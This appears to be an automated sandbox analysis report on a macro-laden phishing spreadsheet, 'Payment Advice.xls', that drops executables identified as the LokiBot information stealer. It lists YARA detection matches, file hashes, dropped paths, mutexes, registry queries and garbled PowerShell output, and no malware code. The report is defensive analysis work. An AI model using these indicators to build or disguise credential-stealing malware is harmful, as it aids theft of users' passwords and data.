Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001D1093	21_2_001D1093
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001D10D2	21_2_001D10D2
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001DC178	21_2_001DC178
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001DC5B0	21_2_001DC5B0
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001D7848	21_2_001D7848
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001DD9D8	21_2_001DD9D8
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001DCAF8	21_2_001DCAF8
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 21_2_001DBD40	21_2_001DBD40
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 31_2_0040549C	31_2_0040549C
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: 31_2_004029D4	31_2_004029D4
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_001904C0	38_2_001904C0
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_00192808	38_2_00192808
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_001910DE	38_2_001910DE
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_0019C178	38_2_0019C178
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_0019C5B0	38_2_0019C5B0
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_0019D9D8	38_2_0019D9D8
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_0019CAF8	38_2_0019CAF8
Source: C:\Users\user\AppData\Roaming\caspol.exe	Code function: 38_2_0019BD40	38_2_0019BD40

Source: Payment Advice.xls	OLE indicator, VBA macros: true
Source: tmp9F6B.tmp.11.dr	OLE indicator, VBA macros: true
Source: tmpBD09.tmp.21.dr	OLE indicator, VBA macros: true
Source: tmpF9BA.tmp.38.dr	OLE indicator, VBA macros: true

Source: ~DFAAE5253A99F2DBD6.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: tmp9F6B.tmp.11.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: tmpBD09.tmp.21.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: tmpF9BA.tmp.38.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe 89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) 89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C

Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Users\user\AppData\Roaming\caspol.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.caspol.exe.36cfc30.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.caspol.exe.36e9c50.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: caspol.exe PID: 3064, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 2148, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1988, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: caspol[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: caspol.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rrwscqkDSNwLK.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 11.2.caspol.exe.370e230.3.raw.unpack, a6RnQjwUyOApqVRoTt.cs	Security API names: _0020.SetAccessControl
Source: 11.2.caspol.exe.370e230.3.raw.unpack, a6RnQjwUyOApqVRoTt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.caspol.exe.370e230.3.raw.unpack, a6RnQjwUyOApqVRoTt.cs	Security API names: _0020.AddAccessRule
Source: 11.2.caspol.exe.370e230.3.raw.unpack, zHSLcC0xi2VDKUoIki.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winXLS@53/60@10/3

Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe

Code function: 31_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

31_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\2D330000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\caspol.exe	Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Users\user\AppData\Roaming\caspol.exe	Mutant created: \Sessions\1\BaseNamedObjects\otkaVhUbioxCcU

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR9146.tmp

Jump to behavior

Source: Payment Advice.xls	OLE indicator, Workbook stream: true
Source: PORTS SITUATION BULK CARRIERS.xlsx.0.dr	OLE indicator, Workbook stream: true
Source: 2D330000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.m.......m......@.......................@.......@.......................3.......................@..............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................m.....}..w......m......................1......(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................m.......m.....}..w.............................1......(.P..............3...................... ...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................C2.l....}..w.... .......\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............h......2.l....X.h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm......................C2.l....}..w.... .......\.......................(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............h......2.l....X.h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...h......2.l....X.h.....(.P............................. .......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .D.e.V.i.C.e.c.R.e.D.e.n.T.I.a.l.d.E.p.L.O.y.m.e.n.t.(.P.............................8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............h......2.l....X.h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................ .......}..w..............h......2.l....X.h.....(.P.............................l.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ....... .......}..w..............h......2.l....X.h.....(.P.....................................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............+..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............8..........................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............J..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............W..........................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............j..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............w..........................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n...............\..........................................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\..........................................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............8....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\..........................................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\..........................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\..........................................s............8...............................
